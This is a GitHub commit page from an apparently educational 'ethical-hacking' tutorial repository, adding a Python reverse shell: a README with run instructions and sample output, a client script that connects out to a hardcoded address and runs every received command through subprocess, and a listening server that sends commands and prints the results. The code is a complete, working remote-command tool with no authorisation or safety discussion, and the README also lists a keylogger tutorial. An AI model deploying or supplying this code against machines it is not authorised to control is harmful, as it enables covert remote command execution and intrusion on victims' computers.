Skip to content

Commit 47907e9

Browse files
x4nth055x4nth055
committed
add reverse shell tutorial
1 parent 7aaff67 commit 47907e9

File tree

4 files changed

+104
-0
lines changed

4 files changed

+104
-0
lines changed

README.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -15,6 +15,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
1515
- [How to Sniff HTTP Packets in the Network using Scapy in Python](https://www.thepythoncode.com/article/sniff-http-packets-scapy-python). ([code](scapy/http-sniffer))
1616
- [Writing a Keylogger in Python from Scratch](https://www.thepythoncode.com/article/write-a-keylogger-python). ([code](ethical-hacking/keylogger))
1717
- [Making a Port Scanner using sockets in Python](https://www.thepythoncode.com/article/make-port-scanner-python). ([code](ethical-hacking/port_scanner))
18+
- [How to Create a Reverse Shell in Python](https://www.thepythoncode.com/article/create-reverse-shell-python). ([code](ethical-hacking/reverse_shell))
1819

1920
- ### [Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
2021
- ### [Natural Language Processing](https://www.thepythoncode.com/topic/nlp)

ethical-hacking/reverse_shell/README.md

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
# [How to Create a Reverse Shell in Python](https://www.thepythoncode.com/article/create-reverse-shell-python)
2+
You don't need to install anything.
3+
- To run the server, simply write:
4+
```
5+
python server.py
6+
```
7+
**Output:**
8+
```
9+
Listening as 0.0.0.0:5003 ...
10+
```
11+
- Running the client (target machine):
12+
```
13+
python client.py
14+
```
15+
**Output:**
16+
```
17+
Server: Hello and Welcome
18+
```
19+
- The server will get notified once a client is connected, executing `dir` command on Windows remotely (in `server.py`):
20+
```
21+
192.168.1.103:58428 Connected!
22+
Enter the command you wanna execute:dir
23+
Volume in drive E is DATA
24+
Volume Serial Number is 644B-A12C
25+
26+
Directory of E:\test
27+
28+
09/24/2019 02:15 PM <DIR> .
29+
09/24/2019 02:15 PM <DIR> ..
30+
0 File(s) 0 bytes
31+
2 Dir(s) 89,655,123,968 bytes free
32+
Enter the command you wanna execute:exit
33+
```

ethical-hacking/reverse_shell/client.py

Lines changed: 28 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
import socket
2+
import subprocess
3+
4+
SERVER_HOST = "192.168.1.103"
5+
SERVER_PORT = 5003
6+
BUFFER_SIZE = 1024
7+
8+
# create the socket object
9+
s = socket.socket()
10+
# connect to the server
11+
s.connect((SERVER_HOST, SERVER_PORT))
12+
13+
# receive the greeting message
14+
message = s.recv(BUFFER_SIZE).decode()
15+
print("Server:", message)
16+
17+
while True:
18+
# receive the command from the server
19+
command = s.recv(BUFFER_SIZE).decode()
20+
if command.lower() == "exit":
21+
# if the command is exit, just break out of the loop
22+
break
23+
# execute the command and retrieve the results
24+
output = subprocess.getoutput(command)
25+
# send the results back to the server
26+
s.send(output.encode())
27+
# close client connection
28+
s.close()

ethical-hacking/reverse_shell/server.py

Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
import socket
2+
3+
SERVER_HOST = "0.0.0.0"
4+
SERVER_PORT = 5003
5+
6+
BUFFER_SIZE = 1024
7+
8+
# create a socket object
9+
s = socket.socket()
10+
11+
# bind the socket to all IP addresses of this host
12+
s.bind((SERVER_HOST, SERVER_PORT))
13+
# make the PORT reusable
14+
# when you run the server multiple times in Linux, Address already in use error will raise
15+
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
16+
s.listen(5)
17+
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
18+
19+
# accept any connections attempted
20+
client_socket, client_address = s.accept()
21+
print(f"{client_address[0]}:{client_address[1]} Connected!")
22+
23+
# just sending a message, for demonstration purposes
24+
message = "Hello and Welcome".encode()
25+
client_socket.send(message)
26+
27+
while True:
28+
# get the command from prompt
29+
command = input("Enter the command you wanna execute:")
30+
# send the command to the client
31+
client_socket.send(command.encode())
32+
if command.lower() == "exit":
33+
# if the command is exit, just break out of the loop
34+
break
35+
# retrieve command results
36+
results = client_socket.recv(BUFFER_SIZE).decode()
37+
# print them
38+
print(results)
39+
# close connection to the client
40+
client_socket.close()
41+
# close server connection
42+
s.close()

0 commit comments

Comments
 (0)